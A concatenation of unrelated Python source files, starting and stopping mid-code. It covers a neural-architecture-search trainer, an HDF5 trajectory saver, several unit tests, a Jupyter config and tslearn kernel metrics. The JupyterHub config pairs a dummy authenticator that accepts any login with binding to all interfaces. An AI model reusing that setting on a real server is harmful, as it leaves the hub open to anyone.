losses.update(loss_proj+reduced_loss_ce.item(), input_x.shape[0]) losses_ce.update(reduced_loss_ce.item(), input_x.shape[0]) losses_proj.update(loss_proj, input_x.shape[0]) lr.update(self.opt.param_groups[0]['lr']) batch_time.update(time.time() - end) end = time.time() # show the training/evaluating statistics if self.check_is_primary() and ((idx % self.args.print_freq == 0) or (idx + 1) % loader_len == 0): progress.show(idx) return top1.avg, losses.avg def beam_search_eval(self, epoch=None): best_acc = -np.inf # best_loss = np.inf best_arch_logP = None best_arch_ent = None best_arch = None best_logits = None beam_size = self.args.top_seq cand_seq, logits_seq, logP_accum, entropy_accum = self.model.arch_master.beam_search(beam_size) if self.args.distributed: dist.broadcast(cand_seq, 0) # NOTE: archs_seq are the same, no noed to broadcase # print(self.args.rank, logits_seq[0]) # dist.broadcast(logits_seq, 0) dist.broadcast(logP_accum, 0) dist.broadcast(entropy_accum, 0) parallel_eval = True if self.args.distributed and beam_size%self.args.world_size==0 and not self.args.fix_random \ else False if parallel_eval: idx = 0 while idx < beam_size: top1 = AverageMeter('cand top1', ':3.3f') arch_id = idx + self.args.rank cand = cand_seq[arch_id] # arch = [self.model.candidate_width[v] for v in cand] # print("On rank: %d, Evaluating the %d-th arch, archs: %s" % (self.args.rank, arch_id, str(cand))) print("On rank: %d, %d-th Arch: %s" % (self.args.rank, arch_id, \ decode_cfg(self.args, cand, self.model.num_blocks, self.model.block_layer_num))) # NOTE: comment this for fast eval for test_input, test_target in self.test_loader: test_input, test_target = test_input.to(self.device), test_target.to(self.device) logits = self.model.test_forward(test_input, cand) acc = accuracy(logits, test_target)[0] top1.update(acc.item(), test_input.size(0)) flops = self.model.arch_master._compute_flops(cand) # print all the sampled archs in parallel print("Rank: %d, Arch id:%d, Acc:%.3f, log P:%.4e, entropy:%.4e, flops:%e" % \ (self.args.rank, arch_id, top1.avg, logP_accum[arch_id].item(), entropy_accum[arch_id].item(), flops)) # init group vars to be gathered top1 = torch.tensor(top1.avg).float().cuda() g_top1 = [torch.ones_like(top1) for _ in range(self.args.world_size)] # collect results on different GPUs dist.all_gather(g_top1, top1) if self.check_is_primary(): max_ind = np.argmax(g_top1) if g_top1[max_ind] > best_acc: best_acc = g_top1[max_ind] best_arch = cand best_arch_logP = logP_accum[idx+max_ind].item() best_arch_ent = entropy_accum[idx+max_ind].item() idx += self.args.world_size else: if self.check_is_primary(): for idx, cand in enumerate(cand_seq): # enumerate over each cand arch and perform testing top1 = AverageMeter('cand top1', ':3.3f') # NOTE: comment this for fast eval for test_input, test_target in self.test_loader: test_input, test_target = test_input.to(self.device), test_target.to(self.device) logits = self.model.test_forward(test_input, cand) acc = accuracy(logits, test_target)[0] top1.update(acc.item(), test_input.size(0)) flops = self.model.arch_master._compute_flops(cand) # print all the sampled archs on primary rank print("%d-th Arch: %s" % (idx, decode_cfg(self.args, cand, self.model.num_blocks, self.model.block_layer_num))) print("Arch id:%d, Acc:%.3f, log P:%.4e, entropy:%.4e, flops:%e" % \ (idx, top1.avg, logP_accum[idx].item(), entropy_accum[idx].item(), flops)) if top1.avg > best_acc: best_acc = top1.avg best_arch = cand best_arch_logP = logP_accum[idx].item() best_arch_ent = entropy_accum[idx].item() if self.check_is_primary() and self.model.num_cand> 1: avg_logits = [torch.stack(logits) for logits in logits_seq] avg_logits = torch.stack(avg_logits).mean(0) avg_arch_info, avg_discrepancy = self.model.get_arch_info(avg_logits) print(avg_arch_info) logging.info("Best: Accuracy %f -LogP %f ENT %f",best_acc, -best_arch_logP, best_arch_ent) logging.info("Best Arch: %s" % str(best_arch)) logging.info("Beam search done. size: %d" % beam_size) # sync back if self.args.distributed: dist.barrier() def epoch_eval(self, epoch): best_acc = -np.inf # best_loss = np.inf best_arch_logP = None best_arch_ent = None best_arch = None avg_logits_list = [] parallel_eval = True if self.args.distributed and \ self.args.n_test_archs % self.args.world_size == 0 and not self.args.fix_random \ else False if parallel_eval: # NOTE: a new parallel way to perform evaluation with differet arch if self.check_is_primary(): logging.info("Now parallel evaluating different archs") idx = 0 while (idx<self.args.n_test_archs): top1, arch_cand, arch_logP, arch_entropy, arch_info, discrepancy = self.model.test_cand_arch(self.test_loader) flops = self.model.arch_master._compute_flops(arch_cand) # logging.info("Rank:%d, Arch id:%d, %s, Acc:%.3f, log P:%.4e, entropy:%.4e, flops:%e" % \ # (self.args.rank, idx+self.args.rank, str(arch_cand.tolist()), top1, arch_logP.item(), arch_entropy.item(), flops)) # print all the sampled archs print("Rank:%d, Arch id:%d, %s, Acc:%.3f, log P:%.4e, entropy:%.4e, flops:%e" % \ (self.args.rank, idx+self.args.rank, str(arch_cand.tolist()), top1, arch_logP.item(), arch_entropy.item(), flops)) # print all the sampled archs dist.barrier() idx += self.args.world_size top1 = torch.tensor(top1).float().cuda() # init group vars to be gathered g_top1 = [torch.ones_like(top1) for _ in range(self.args.world_size)] g_logits = [torch.ones_like(self.model.logits) for _ in range(self.args.world_size)] g_arch_cand = [torch.ones_like(arch_cand) for _ in range(self.args.world_size)] g_entropy = [torch.ones_like(arch_entropy) for _ in range(self.args.world_size)] g_arch_logP = [torch.ones_like(arch_logP) for _ in range(self.args.world_size)] # collect results on different GPUs dist.all_gather(g_top1, top1) dist.all_gather(g_arch_logP, arch_logP) dist.all_gather(g_entropy, arch_entropy) dist.all_gather(g_arch_cand, arch_cand) dist.all_gather(g_logits, self.model.logits) if self.check_is_primary(): avg_logits_list += g_logits max_ind = np.argmax(g_top1) if g_top1[max_ind] > best_acc: best_acc = g_top1[max_ind] best_arch = g_arch_cand[max_ind] best_arch_logP = g_arch_logP[max_ind] best_arch_ent = g_entropy[max_ind] dist.barrier() else: if self.check_is_primary(): # sample 20 archs and take the best one. logging.info("Single model evluating...") for i in range(self.args.n_test_archs): top1, arch_cand, arch_logP, arch_entropy, arch_info, discrepancy = self.model.test_cand_arch(self.test_loader) flops = self.model.arch_master._compute_flops(arch_cand) logging.info("Arch: %s", decode_cfg(self.args, arch_cand, self.model.num_blocks, self.model.block_layer_num)) logging.info("Arch id:%d, %s, Acc:%.3f, log P:%.4e, entropy:%.4e, flops:%e" % \ (i, str(arch_cand.tolist()), top1, arch_logP.item(), arch_entropy.item(), flops)) # print all the sampled archs avg_logits_list.append(self.model.logits) if top1 > best_acc: best_acc = top1 best_arch = arch_cand best_arch_logP = arch_logP best_arch_ent = arch_entropy if self.check_is_primary() and self.model.num_cand > 1: avg_logits = torch.stack(avg_logits_list) avg_arch_info, avg_discrepancy = self.model.get_arch_info(avg_logits.mean(0)) print(avg_arch_info) logging.info("Best: Accuracy %f -LogP %f ENT %f",best_acc, -best_arch_logP, best_arch_ent) logging.info("Best Arch: %s", decode_cfg(self.args, best_arch, self.model.num_blocks, self.model.block_layer_num)) logging.info("Random sample evaluation done.") # sync back if self.args.distributed: dist.barrier() def __setup_optim(self): """ Set up optimizer for network parameters and projection matrix seperately (not arch parameters) """ self.opt = optim.SGD(self.model.meta_parameters(), lr=self.args.lr, momentum=self.args.momentum, \ nesterov=self.args.nesterov, weight_decay=self.args.weight_decay) self.proj_opt = optim.SGD(self.model.projection_parameters(), lr=self.proj_lr, momentum=self.args.momentum, \ nesterov=self.args.nesterov, weight_decay=self.args.weight_decay) # proj_lr is adjusted in self.train() if self.args.lr_decy_type == 'multi_step': self.lr_scheduler = optim.lr_scheduler.MultiStepLR(self.opt, milestones=[\ int(self.args.epochs * 0.5), int(self.args.epochs * 0.75)]) elif self.args.lr_decy_type == 'cosine': self.lr_scheduler = optim.lr_scheduler.CosineAnnealingLR(\ self.opt, self.args.epochs, eta_min=self.args.lr_min) else: raise ValueError("Unknown model, failed to initalize optim") def __build_path(self): if self.args.exec_mode == 'train': self.save_path = os.path.join(self.args.save_path, '_'.join([self.args.model_type, self.args.learner]), self.args.job_id, 'model.pt') self.load_path = self.save_path elif self.args.exec_mode == 'finetune': self.load_path = self.args.load_path if self.args.warmup_epochs == self.args.epochs: # further warmup with decayed learning rate self.save_path = os.path.join(os.path.dirname(self.load_path), 'model_ft_%s.pt' % self.args.job_id) else: self.save_path = os.path.join(os.path.dirname(self.load_path), 'model_search_%s.pt' % self.args.job_id) else: self.load_path = self.args.load_path self.save_path = self.load_path def check_is_primary(self): if (self.args.distributed and self.args.rank == 0) or \ not self.args.distributed: return True else: return False def save_model(self, file_name=None): if file_name is None: file_name = self.save_path else: file_name = os.path.join(os.path.dirname(self.save_path), file_name) state = {'state_dict': self.model.state_dict(), \ 'optimizer': self.opt.state_dict(), \ 'arch_optimizer': self.architect.optimizer.state_dict()} torch.save(state, file_name) logging.info("Model stored at: " + file_name) def load_model(self): if self.args.distributed: # read parameters to each GPU seperately loc = 'cuda:{}'.format(torch.cuda.current_device()) checkpoint = torch.load(self.load_path, map_location=loc) else: checkpoint = torch.load(self.load_path) self.model.load_state_dict(checkpoint['state_dict']) # NOTE: for wamrup, useless to restore optimizer params. # self.opt.load_state_dict(checkpoint['optimizer']) # self.architect.optimizer.load_state_dict(checkpoint['arch_optimizer']) logging.info("Model succesfully restored from %s" % self.load_path) if self.args.distributed: broadcast_params(self.model)
497865
import numpy as np import pdb import h5py import os import matplotlib matplotlib.use('agg') import matplotlib.pyplot as plt from recursive_planning.infra.datasets.save_util.record_saver import HDF5SaverBase from utils import AttrDict def pad_traj_timesteps(traj, max_num_actions): """ pad images and actions with zeros :param traj: :param max_num_actions: :return: """ im_shape = traj.images.shape ac_shape = traj.actions.shape if ac_shape[0] < max_num_actions: zeros = np.zeros([max_num_actions - im_shape[0] + 1, im_shape[1], im_shape[2], im_shape[3], im_shape[4]], dtype=np.uint8) traj.images = np.concatenate([traj.images, zeros]) if len(ac_shape) > 1: zeros = np.zeros([max_num_actions - ac_shape[0], ac_shape[1]]) else: zeros = np.zeros([max_num_actions - ac_shape[0]]) traj.actions = np.concatenate([traj.actions, zeros]) assert traj.images.shape[0] == max_num_actions + 1 assert traj.actions.shape[0] == max_num_actions return traj def get_pad_mask(action_len, max_num_actions): """ create a 0/1 mask with 1 where there are images and 0 where there is padding :param action_len: the number of actions in trajectory :param max_num_actions: maximum number of actions allowed :return: """ if action_len < max_num_actions: mask = np.concatenate([np.ones(action_len + 1), np.zeros(max_num_actions - action_len)]) elif action_len == max_num_actions: mask = np.ones(max_num_actions + 1) else: raise ValueError assert mask.shape[0] == max_num_actions + 1 return mask class HDF5Saver(HDF5SaverBase): def __init__(self, save_dir, envparams, agentparams, traj_per_file, offset=0, split=(0.90, 0.05, 0.05), split_train_val_test=True): if hasattr(agentparams, 'max_num_actions'): self.max_num_actions = envparams.max_num_actions else: self.max_num_actions = agentparams.T super().__init__(save_dir, traj_per_file, offset, split, split_train_val_test) def _save_manifests(self, agent_data, obs, policy_out): pass def make_traj(self, obs, policy_out): traj = AttrDict() traj.images = obs['images'] traj.states = obs['state'] action_list = [action['actions'] for action in policy_out] traj.actions = np.stack(action_list, 0) traj.pad_mask = get_pad_mask(traj.actions.shape[0], self.max_num_actions) traj = pad_traj_timesteps(traj, self.max_num_actions) return traj def save_traj(self, itr, agent_data, obs, policy_out): traj = self.make_traj(obs, policy_out) self._save_traj(traj)
497875
import os, threading, abc, time class TimedIterateThread(threading.Thread): __metaclass__ = abc.ABCMeta def __init__(self, iter_sleep = None): super(TimedIterateThread, self).__init__() self.exit = threading.Event() self.iter_sleep = iter_sleep @abc.abstractmethod def iterate(self): pass @abc.abstractmethod def cleanup(self): pass def run(self): while not self.exit.is_set(): self.iterate() if self.iter_sleep is not None: time.sleep(self.iter_sleep) self.cleanup() def shutdown(self): self.exit.set() self.join() def create_log_directory(log_directory): # Log directory might refer to ~ log_directory = os.path.expanduser(log_directory) if not os.path.exists(log_directory): print "Creating %s" % log_directory os.makedirs(log_directory) for sub_directory in ["node_coordinators", "run_logs"]: directory = os.path.join(log_directory, sub_directory) if not os.path.exists(directory): print "Creating %s" % directory os.makedirs(directory) return log_directory def create_batch_directory(log_directory, batch_id): batch_directory = os.path.join( log_directory, "run_logs", "batch_%d" % batch_id) if not os.path.exists(batch_directory): os.makedirs(batch_directory) return batch_directory
497895
import pytest from studying.shipment import RecordShipment pytestmark = [pytest.mark.django_db] @pytest.fixture def course(mixer): return mixer.blend('products.Course', name='Кройка и шитьё', name_genitive='Кройки и шитья') @pytest.fixture def record(mixer, course): return mixer.blend('products.Record', course=course) @pytest.fixture def order(factory, record): return factory.order(item=record) @pytest.fixture def shipment(user, record, order): return RecordShipment(user=user, product=record, order=order)
497912
from invoke import run def print_and_run(cmd, **run_kwargs): print(cmd) return run(cmd, **run_kwargs)
497926
import pytest from blacksheep.client import ClientSession, ConnectionTimeout, RequestTimeout from . import FakePools @pytest.mark.asyncio async def test_connection_timeout(): fake_pools = FakePools([]) fake_pools.pool.sleep_for = ( 5 # wait for 5 seconds before returning a connection; to test timeout handling ) async with ClientSession( base_url=b"http://localhost:8080", pools=fake_pools, connection_timeout=0.002, # 2ms - not realistic, but ok for this test ) as client: with pytest.raises(ConnectionTimeout): await client.get(b"/") @pytest.mark.asyncio async def test_request_timeout(): fake_pools = FakePools([]) fake_pools.pool.connection.sleep_for = ( 5 # wait for 5 seconds before returning a response; ) async with ClientSession( base_url=b"http://localhost:8080", pools=fake_pools, request_timeout=0.002, # 2ms - not realistic, but ok for this test ) as client: with pytest.raises(RequestTimeout): await client.get(b"/")
497936
import os c = get_config() c.JupyterHub.spawner_class = 'marathonspawner.MarathonSpawner' c.JupyterHub.ip = '0.0.0.0' c.JupyterHub.hub_ip = '0.0.0.0' c.JupyterHub.cmd = 'start-singleuser.sh' c.JupyterHub.cleanup_servers = False c.MarathonSpawner.app_prefix = 'jupyter' c.MarathonSpawner.app_image = 'jupyterhub/singleuser' c.MarathonSpawner.app_prefix = 'jupyter' c.MarathonSpawner.marathon_host = 'http://leader.mesos:8080' c.MarathonSpawner.ports = [8000] c.MarathonSpawner.mem_limit = '2G' c.MarathonSpawner.cpu_limit = 1 c.JupyterHub.authenticator_class = 'dummyauthenticator.DummyAuthenticator'
497952
import json from unittest import mock, skip import jira from django.test import TestCase from django.utils import timezone from jira import User from waldur_core.core.utils import datetime_to_timestamp from waldur_mastermind.support import models from waldur_mastermind.support.backend.atlassian import ServiceDeskBackend from waldur_mastermind.support.tests import factories, fixtures from waldur_mastermind.support.tests.base import load_resource class BaseBackendTest(TestCase): def setUp(self): super(BaseBackendTest, self).setUp() self.fixture = fixtures.SupportFixture() self.backend = ServiceDeskBackend() jira_patcher = mock.patch('waldur_jira.backend.JIRA') self.mocked_jira = jira_patcher.start()() self.mocked_jira.fields.return_value = json.loads( load_resource('jira_fields.json') ) mock_backend_users = [ User({'server': ''}, None, raw={'key': 'user_1', 'active': True}) ] self.mocked_jira.waldur_search_users.return_value = mock_backend_users def tearDown(self): super(BaseBackendTest, self).tearDown() mock.patch.stopall() class IssueCreateTest(BaseBackendTest): def setUp(self): super(IssueCreateTest, self).setUp() issue = self.fixture.issue issue.type = 'Task' issue.priority = 'Major' issue.save() self.issue = issue factories.RequestTypeFactory(issue_type_name=issue.type) self.mocked_jira.waldur_create_customer_request.return_value = mock.Mock( **{ 'key': 'TST-101', 'fields.assignee.key': '', 'fields.assignee.name': '', 'fields.assignee.emailAddress': '', 'fields.assignee.displayName': '', 'fields.creator.key': '', 'fields.creator.name': '', 'fields.creator.emailAddress': '', 'fields.creator.displayName': '', 'fields.reporter.key': '', 'fields.reporter.name': '', 'fields.reporter.emailAddress': '', 'fields.reporter.displayName': '', 'fields.resolutiondate': '', 'fields.summary': '', 'fields.description': '', 'fields.status.name': '', 'fields.resolution': '', 'fields.priority.name': 'Major', 'fields.issuetype.name': 'Task', 'fields.field103.ongoingCycle.breachTime.epochMillis': 1000, # SLA 'fields.field104': 'Critical', # Impact 'permalink()': '', } ) self.mocked_jira.waldur_create_customer_request.return_value.permalink.return_value = ( 'http://example.com/TST-101' ) def test_user_for_caller_is_created(self): self.mocked_jira.waldur_search_users.return_value = [] self.backend.create_issue(self.issue) self.mocked_jira.create_customer.assert_called_once_with( self.issue.caller.email, self.issue.caller.full_name ) @skip( 'Skip till the correct behaviour for requestParticipant reference is assured.' ) def test_caller_is_specified_in_custom_field(self): self.backend.create_issue(self.issue) kwargs = self.mocked_jira.create_customer_request.call_args[0][0] self.assertEqual( kwargs['requestParticipants'], [self.issue.caller.supportcustomer.backend_id], ) def test_original_reporter_is_specified_in_custom_field(self): self.backend.create_issue(self.issue) kwargs = self.mocked_jira.waldur_create_customer_request().update.call_args[1] self.assertEqual(kwargs['field102'], self.issue.reporter.name) class IssueUpdateTest(BaseBackendTest): def setUp(self): super(IssueUpdateTest, self).setUp() self.mocked_jira.issue.return_value = mock.Mock( **{ 'key': 'TST-101', 'fields.assignee.key': '', 'fields.assignee.name': '', 'fields.assignee.emailAddress': '', 'fields.assignee.displayName': '', 'fields.creator.key': '', 'fields.creator.name': '', 'fields.creator.emailAddress': '', 'fields.creator.displayName': '', 'fields.reporter.key': '', 'fields.reporter.name': '', 'fields.reporter.emailAddress': '', 'fields.reporter.displayName': '', 'fields.resolutiondate': '', 'fields.summary': '', 'fields.description': '', 'fields.status.name': '', 'fields.resolution': '', 'fields.priority.name': 'Major', 'fields.issuetype.name': 'Task', 'fields.field103.ongoingCycle.breachTime.epochMillis': 1000, # SLA 'fields.field104': 'Critical', # Impact } ) self.mocked_jira.issue.return_value.permalink.return_value = ( 'http://example.com/TST-101' ) def test_sla_is_populated(self): # Arrange issue = self.fixture.issue dt = timezone.now().replace(microsecond=0) ts = datetime_to_timestamp(dt) * 1000 self.mocked_jira.issue.return_value.fields.field103.ongoingCycle.breachTime.epochMillis = ( ts ) # Act self.backend.update_issue_from_jira(issue) issue.refresh_from_db() # Assert self.assertEqual(issue.first_response_sla, dt) def test_assignee_is_populated(self): issue = self.fixture.issue self.mocked_jira.issue.return_value.fields.assignee.key = '<EMAIL>' self.backend.update_issue_from_jira(issue) issue.refresh_from_db() self.assertEqual(issue.assignee.backend_id, '<EMAIL>') def test_reporter_is_populated(self): issue = self.fixture.issue self.mocked_jira.issue.return_value.fields.reporter.key = '<EMAIL>' self.backend.update_issue_from_jira(issue) issue.refresh_from_db() self.assertEqual(issue.reporter.backend_id, '<EMAIL>') def test_issue_is_resolved(self): issue = self.fixture.issue resolution_date = timezone.now() self.mocked_jira.issue.return_value.fields.status.name = 'Resolved' self.mocked_jira.issue.return_value.fields.resolutiondate = resolution_date self.backend.update_issue_from_jira(issue) issue.refresh_from_db() self.assertEqual(issue.resolution_date, resolution_date) class CommentCreateTest(BaseBackendTest): def setUp(self): super(CommentCreateTest, self).setUp() self.comment = self.fixture.comment class Response: status_code = 201 def json(self): return {'id': '10001'} self.mocked_jira._session.post.return_value = Response() def create_comment(self): self.backend.create_comment(self.comment) kwargs = self.mocked_jira._session.post.call_args[1] data = json.loads(kwargs['data']) return data def test_backend_id_is_populated(self): self.create_comment() self.comment.refresh_from_db() self.assertEqual(self.comment.backend_id, '10001') def test_original_author_is_specified(self): self.comment.description = 'Comment description' self.comment.save() user = self.comment.author.user user.full_name = '<NAME>' user.civil_number = None user.save() data = self.create_comment() self.assertEqual('[Alice Lebowski]: Comment description', data['body']) def test_internal_flag_is_specified(self): self.comment.is_public = False self.comment.save() data = self.create_comment() expected = [{'key': 'sd.public.comment', 'value': {'internal': True}}] self.assertEqual(expected, data['properties']) def test_of_author_when_create_comment_from_jira(self): issue = factories.IssueFactory() backend_comment_raw = json.loads(load_resource('jira_comment_raw.json')) self.backend_comment = jira.resources.Comment( {'server': 'example.com'}, None, backend_comment_raw ) self.mocked_jira.comment.return_value = self.backend_comment self.backend.create_comment_from_jira(issue, self.backend_comment.id) comment = models.Comment.objects.get(issue=issue) self.assertEqual(comment.author.backend_id, 'user') class CommentUpdateTest(BaseBackendTest): def setUp(self): super(CommentUpdateTest, self).setUp() self.mocked_jira.comment.return_value = mock.Mock( **{ 'body': '[<NAME>]: New comment description', 'author': mock.Mock(**{'key': '<EMAIL>'}), } ) self.mocked_jira._session.get.return_value.json.return_value = { 'value': {'internal': True} } def test_description_is_updated(self): # Arrange comment = self.fixture.comment comment.description = 'Old comment description' comment.save() # Act self.backend.update_comment_from_jira(comment) # Assert comment.refresh_from_db() self.assertEqual(comment.description, 'New comment description') def test_author_is_populated(self): comment = self.fixture.comment self.backend.update_comment_from_jira(comment) comment.refresh_from_db() self.assertEqual(comment.author.backend_id, '<EMAIL>') def test_internal_flag_is_updated(self): # Arrange comment = self.fixture.comment comment.is_public = True comment.save() # Act self.backend.update_comment_from_jira(comment) # Assert comment.refresh_from_db() self.assertFalse(comment.is_public)
497976
import unittest from dojo import * class DojoTest(unittest.TestCase): def test_true(self): self.assertTrue(main()) def teste_hash_1(self): self.assertEqual(MyHashMap._hash(53), 5) def teste_hash_2(self): self.assertEqual(MyHashMap._hash(56), 0) def test_get_1(self): my_hmap = MyHashMap() my_hmap.set(53, "Olá") self.assertEqual(my_hmap.get(53), "Olá") def teste_get_2(self): my_hmap = MyHashMap() my_hmap.set(53, "Olá") my_hmap.set(54, "Tudo bem") self.assertEqual(my_hmap.get(54), "Tudo bem") def teste_get_3(self): my_hmap = MyHashMap() my_hmap.set(53, "Olá") my_hmap.set(54, "Tudo bem") self.assertEqual(my_hmap.get(5), None) # def teste_len_1(self): # my_hmap = MyHashMap() # my_hmap.set(53, "Olá") # my_hmap.set(54, "Tudo bem") # self.assertEqual(my_hmap.len(), 2) def teste_len_1(self): my_hmap = MyHashMap() my_hmap.set(53, "Olá") my_hmap.set(54, "Tudo bem") self.assertEqual(len(my_hmap), 2) def teste_repeated_1(self): my_hmap = MyHashMap() my_hmap.set(53, "Olá") my_hmap.set(53, "Tudo bem") self.assertEqual(len(my_hmap), 1) self.assertEqual(my_hmap.get(53), "Tudo bem") def test_delete_1(self): my_hmap = MyHashMap() my_hmap.set(53, "Olá") my_hmap.set(5, "Tudo bem") self.assertEqual(len(my_hmap), 2) self.assertEqual(my_hmap.get(53), "Olá") print(my_hmap.arr) my_hmap.delete(5) self.assertEqual(len(my_hmap), 1) self.assertEqual(my_hmap.get(5), None) print(my_hmap.arr) if __name__ == "__main__": unittest.main()
497984
import numpy from joblib import Parallel, delayed from numba import njit from scipy.spatial.distance import pdist, cdist from sklearn.metrics.pairwise import euclidean_distances from sklearn.utils import check_random_state from tslearn.utils import to_time_series, to_time_series_dataset, ts_size, \ check_equal_size from .utils import _cdist_generic from .dtw_variants import dtw, dtw_path from .soft_dtw_fast import _soft_dtw, _soft_dtw_grad, \ _jacobian_product_sq_euc __author__ = '<NAME> <EMAIL>[at]<EMAIL>' GLOBAL_CONSTRAINT_CODE = {None: 0, "": 0, "itakura": 1, "sakoe_chiba": 2} TSLEARN_VALID_METRICS = ["dtw", "gak", "softdtw", "sax"] VARIABLE_LENGTH_METRICS = ["dtw", "gak", "softdtw", "sax"] @njit(nogil=True) def njit_gak(s1, s2, gram): l1 = s1.shape[0] l2 = s2.shape[0] cum_sum = numpy.zeros((l1 + 1, l2 + 1)) cum_sum[0, 0] = 1. for i in range(l1): for j in range(l2): cum_sum[i + 1, j + 1] = (cum_sum[i, j + 1] + cum_sum[i + 1, j] + cum_sum[i, j]) * gram[i, j] return cum_sum[l1, l2] def _gak_gram(s1, s2, sigma=1.): gram = - cdist(s1, s2, "sqeuclidean") / (2 * sigma ** 2) gram -= numpy.log(2 - numpy.exp(gram)) return numpy.exp(gram) def unnormalized_gak(s1, s2, sigma=1.): r"""Compute Global Alignment Kernel (GAK) between (possibly multidimensional) time series and return it. It is not required that both time series share the same size, but they must be the same dimension. GAK was originally presented in [1]_. This is an unnormalized version. Parameters ---------- s1 A time series s2 Another time series sigma : float (default 1.) Bandwidth of the internal gaussian kernel used for GAK Returns ------- float Kernel value Examples -------- >>> unnormalized_gak([1, 2, 3], ... [1., 2., 2., 3.], ... sigma=2.) # doctest: +ELLIPSIS 15.358... >>> unnormalized_gak([1, 2, 3], ... [1., 2., 2., 3., 4.]) # doctest: +ELLIPSIS 3.166... See Also -------- gak : normalized version of GAK that ensures that k(x,x) = 1 cdist_gak : Compute cross-similarity matrix using Global Alignment kernel References ---------- .. [1] <NAME>, "Fast global alignment kernels," ICML 2011. """ s1 = to_time_series(s1, remove_nans=True) s2 = to_time_series(s2, remove_nans=True) gram = _gak_gram(s1, s2, sigma=sigma) gak_val = njit_gak(s1, s2, gram) return gak_val def gak(s1, s2, sigma=1.): # TODO: better doc (formula for the kernel) r"""Compute Global Alignment Kernel (GAK) between (possibly multidimensional) time series and return it. It is not required that both time series share the same size, but they must be the same dimension. GAK was originally presented in [1]_. This is a normalized version that ensures that :math:`k(x,x)=1` for all :math:`x` and :math:`k(x,y) \in [0, 1]` for all :math:`x, y`. Parameters ---------- s1 A time series s2 Another time series sigma : float (default 1.) Bandwidth of the internal gaussian kernel used for GAK Returns ------- float Kernel value Examples -------- >>> gak([1, 2, 3], [1., 2., 2., 3.], sigma=2.) # doctest: +ELLIPSIS 0.839... >>> gak([1, 2, 3], [1., 2., 2., 3., 4.]) # doctest: +ELLIPSIS 0.273... See Also -------- cdist_gak : Compute cross-similarity matrix using Global Alignment kernel References ---------- .. [1] <NAME>, "Fast global alignment kernels," ICML 2011. """ denom = numpy.sqrt(unnormalized_gak(s1, s1, sigma=sigma) * unnormalized_gak(s2, s2, sigma=sigma)) return unnormalized_gak(s1, s2, sigma=sigma) / denom def cdist_gak(dataset1, dataset2=None, sigma=1., n_jobs=None, verbose=0): r"""Compute cross-similarity matrix using Global Alignment kernel (GAK). GAK was originally presented in [1]_. Parameters ---------- dataset1 A dataset of time series dataset2 Another dataset of time series sigma : float (default 1.) Bandwidth of the internal gaussian kernel used for GAK n_jobs : int or None, optional (default=None) The number of jobs to run in parallel. ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context. ``-1`` means using all processors. See scikit-learns' `Glossary <https://scikit-learn.org/stable/glossary.html#term-n-jobs>`__ for more details. verbose : int, optional (default=0) The verbosity level: if non zero, progress messages are printed. Above 50, the output is sent to stdout. The frequency of the messages increases with the verbosity level. If it more than 10, all iterations are reported. `Glossary <https://joblib.readthedocs.io/en/latest/parallel.html#parallel-reference-documentation>`__ for more details. Returns ------- numpy.ndarray Cross-similarity matrix Examples -------- >>> cdist_gak([[1, 2, 2, 3], [1., 2., 3., 4.]], sigma=2.) array([[1. , 0.65629661], [0.65629661, 1. ]]) >>> cdist_gak([[1, 2, 2], [1., 2., 3., 4.]], ... [[1, 2, 2, 3], [1., 2., 3., 4.], [1, 2, 2, 3]], ... sigma=2.) array([[0.71059484, 0.29722877, 0.71059484], [0.65629661, 1. , 0.65629661]]) See Also -------- gak : Compute Global Alignment kernel References ---------- .. [1] <NAME>, "Fast global alignment kernels," ICML 2011. """ # noqa: E501 unnormalized_matrix = _cdist_generic(dist_fun=unnormalized_gak, dataset1=dataset1, dataset2=dataset2, n_jobs=n_jobs, verbose=verbose, sigma=sigma, compute_diagonal=True) dataset1 = to_time_series_dataset(dataset1) if dataset2 is None: diagonal = numpy.diag(numpy.sqrt(1. / numpy.diag(unnormalized_matrix))) diagonal_left = diagonal_right = diagonal else: dataset2 = to_time_series_dataset(dataset2) diagonal_left = Parallel(n_jobs=n_jobs, prefer="threads", verbose=verbose)( delayed(unnormalized_gak)(dataset1[i], dataset1[i], sigma=sigma) for i in range(len(dataset1)) ) diagonal_right = Parallel(n_jobs=n_jobs, prefer="threads", verbose=verbose)( delayed(unnormalized_gak)(dataset2[j], dataset2[j], sigma=sigma) for j in range(len(dataset2)) ) diagonal_left = numpy.diag(1. / numpy.sqrt(diagonal_left)) diagonal_right = numpy.diag(1. / numpy.sqrt(diagonal_right)) return (diagonal_left.dot(unnormalized_matrix)).dot(diagonal_right) def sigma_gak(dataset, n_samples=100, random_state=None): r"""Compute sigma value to be used for GAK. This method was originally presented in [1]_. Parameters ---------- dataset A dataset of time series n_samples : int (default: 100) Number of samples on which median distance should be estimated random_state : integer or numpy.RandomState or None (default: None) The generator used to draw the samples. If an integer is given, it fixes the seed. Defaults to the global numpy random number generator. Returns ------- float Suggested bandwidth (:math:`\sigma`) for the Global Alignment kernel Examples -------- >>> dataset = [[1, 2, 2, 3], [1., 2., 3., 4.]] >>> sigma_gak(dataset=dataset, ... n_samples=200, ... random_state=0) # doctest: +ELLIPSIS 2.0... See Also -------- gak : Compute Global Alignment kernel cdist_gak : Compute cross-similarity matrix using Global Alignment kernel References ---------- .. [1] <NAME>, "Fast global alignment kernels," ICML 2011. """ random_state = check_random_state(random_state) dataset = to_time_series_dataset(dataset) n_ts, sz, d = dataset.shape if not check_equal_size(dataset): sz = numpy.min([ts_size(ts) for ts in dataset]) if n_ts * sz < n_samples: replace = True else: replace = False sample_indices = random_state.choice(n_ts * sz, size=n_samples, replace=replace) dists = pdist(dataset[:, :sz, :].reshape((-1, d))[sample_indices], metric="euclidean") return numpy.median(dists) * numpy.sqrt(sz) def gamma_soft_dtw(dataset, n_samples=100, random_state=None): r"""Compute gamma value to be used for GAK/Soft-DTW. This method was originally presented in [1]_. Parameters ---------- dataset A dataset of time series n_samples : int (default: 100) Number of samples on which median distance should be estimated random_state : integer or numpy.RandomState or None (default: None) The generator used to draw the samples. If an integer is given, it fixes the seed. Defaults to the global numpy random number generator. Returns ------- float Suggested :math:`\gamma` parameter for the Soft-DTW Examples -------- >>> dataset = [[1, 2, 2, 3], [1., 2., 3., 4.]] >>> gamma_soft_dtw(dataset=dataset, ... n_samples=200, ... random_state=0) # doctest: +ELLIPSIS 8.0... See Also -------- sigma_gak : Compute sigma parameter for Global Alignment kernel References ---------- .. [1] <NAME>, "Fast global alignment kernels," ICML 2011. """ return 2. * sigma_gak(dataset=dataset, n_samples=n_samples, random_state=random_state) ** 2 def soft_dtw(ts1, ts2, 